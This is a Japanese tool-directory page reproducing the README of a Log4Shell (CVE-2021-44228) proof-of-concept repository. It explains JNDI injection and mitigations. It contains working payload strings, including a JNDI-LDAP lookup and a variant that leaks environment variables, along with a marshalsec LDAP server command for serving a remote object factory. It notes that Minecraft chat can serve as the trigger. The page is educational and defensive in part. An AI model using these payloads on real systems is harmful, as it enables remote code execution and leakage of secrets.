Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-44228-example — 脆弱性POC | Kitploit
ツール/GitHubGitHub/kosmx/cve-2021-44228-example
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育リモートアクセスツール
GitHubkosmx/cve-2021-44228-example

CVE-2021-44228-example

脆弱性POC

リポジトリを見る
724年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

これはCVE-2021-44228を悪用する例です

Log4J2 RCE脆弱性


このコードについては一切責任を負いません。お願いします 悪意を持って使用しないでください

CVE-2021-44228:
この脆弱性により、ターゲットマシン上で悪意のあるメッセージをログに記録させることで任意のコードを実行できます。
例えば、**Minecraft**でチャットメッセージを送信することで使用でき、サーバー/プレイヤーマシンがそのチャットメッセージをログに記録し、コードを実行します。
LiveOverflow/CVE-2021-44228 動画

メッセージには、リモートオブジェクトをロードするためのプレースホルダー${}とjndi APIの指示を含める必要があります。ObjectFactoryを通じてオブジェクトをロードします。

  • LDAP ldap://x.x.x.x:port/...
  • HTTP http://x.x.x.x/...
  • DNS dns://x.x.x/...
  • など...

${jndi:ldap://127.0.0.1:1389/#}

ObjectFactoryがクライアントに存在しない場合、何も起こりません。
サーバーを解決する場合を除きます。
これを使用して、環境変数を漏洩させることができます:

${jndi:ldap://127.0.0.1:1389/${env:java_home}}

このRCEはなぜ過大評価されているのか?

なぜ過大評価されているのか?
私の理解が正しければ、JNDIへのインターフェースを提供します

何が悪用されるのか

JNDI JDAPはオブジェクトルックアップAPIです。
サーバーからJavaオブジェクトを取得できます。
marshalsec/LDAPRefServer
オブジェクトデータと、クライアント上でオブジェクトを構築するためのObjectFactory名を送信します。
複数の方法で悪用される可能性があります。
LDAPが外部コードを信頼するように有効になっている場合、悪意のあるObjectFactoryへのURLを指定するだけで済みます。
com.sun.jndi.ldap.object.trustURLCodebase = true
または、別のJava脆弱性があります。JDK-8196902
これと組み合わせることで、本当にRCEになります。
GitHub上には複数のPOCリポジトリがあります。例えば tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

これがfalseに設定されている場合(デフォルトではfalse)、ターゲットコードベース内で悪用可能なObjectFactoryを探すか、別の方法でJNDIを悪用することができます。

JNDIインジェクションに関する詳細情報:
JNDIインジェクション
Veracode Research/rogue-jndi

例では:

RCEExampleは悪意のあるメッセージをログに記録する関数です。
実行するには、単にRunを押してください...

LoggerFactoryは、受け取ったものを何でもログに記録するObjectFactoryです。
marshalsecをビルドすると、それにLoggerFactoryを使用するように指示できます。

  1. java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1/#LoggerFactory"
  2. rce.RCEExampleを実行して、エクスプロイト(ロガー)を確認してください。
  3. このプロジェクトをデバッグし、LoggerFactoryにブレークポイントを設定してオブジェクトを確認できます。

プログラムの保護

プログラムが組み込みメッセージのみをログに記録する場合、影響を受けません。
プログラムがデータファイルやネットワークからテキストをログに記録できる場合、脆弱です。
ただし、いずれにせよ修正すべきです...

最善の対策は、Log4J2 2.15.0以降にアップデートすることです。
何らかの理由でそれができない場合は、次のJava引数でJNDIルックアップを無効にすることで脆弱性を緩和できます: ‐Dlog4j2.formatMsgNoLookups=True

Minecraftサーバー管理者の方は、公式ガイドに従ってください: 重要なお知らせ: Java Editionのセキュリティ脆弱性

ツールをダウンロード